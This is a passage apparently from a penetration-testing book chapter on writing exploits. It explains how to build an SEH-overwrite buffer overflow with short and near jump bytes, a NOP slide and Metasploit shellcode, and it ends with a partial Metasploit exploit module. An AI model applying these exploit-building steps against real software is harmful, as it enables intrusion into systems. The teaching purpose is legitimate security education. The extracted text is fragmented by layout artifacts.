background image

Creating Your Own Exploits

209

When editing your exploit, be sure to adjust the initial buffer length at   

as you make changes, or your alignment will be off. In this case, NSEH is being 
overwritten with the instructions to make a short five-byte jump backward 
(

\xeb\xf9\x90\x90

)  , where 

eb

 is the operation code for a short jump. The 

new lead buffer length is adjusted to 10,356 bytes, because these five new 
bytes come before the SEH overwrite.

When you run the exploit again and step through the instructions in the 

debugger, you should land in the 

41

s (hexadecimal 

A

s) before the exception 

handler values. The five 

INC ECX

 instructions should be replaced with the 

code to jump farther back into the initial buffer.

Now we’ll change the exploit to include the “near jump” (

\xe9\xdd\xd7\

xff\xff

) sequence of instructions, to jump backward to a location near the 

beginning of the buffer. Looking at the buffer (Figure 14-6), you can see that 
the entire string of 

A

s is completely intact, leaving more than 10,000 bytes 

available for shellcode. Since the average space required for functional 
shellcode is less than 500 bytes, this leaves you ample room.

Figure 14-6: Lots of room for shellcode

Now all you have to do is replace the buffer of 

41

s with NOPs (

\x90

) to 

give yourself a nice NOP slide to land in, and then you can sit back and let 
Metasploit take care of the shellcode.

def exploit
        connected = connect_login

lead = "\x90" * (

10351

 - payload.encoded.length)

near = "\xe9\xdd\xd7\xff\xff"

        nseh = "\xeb\xf9\x90\x90"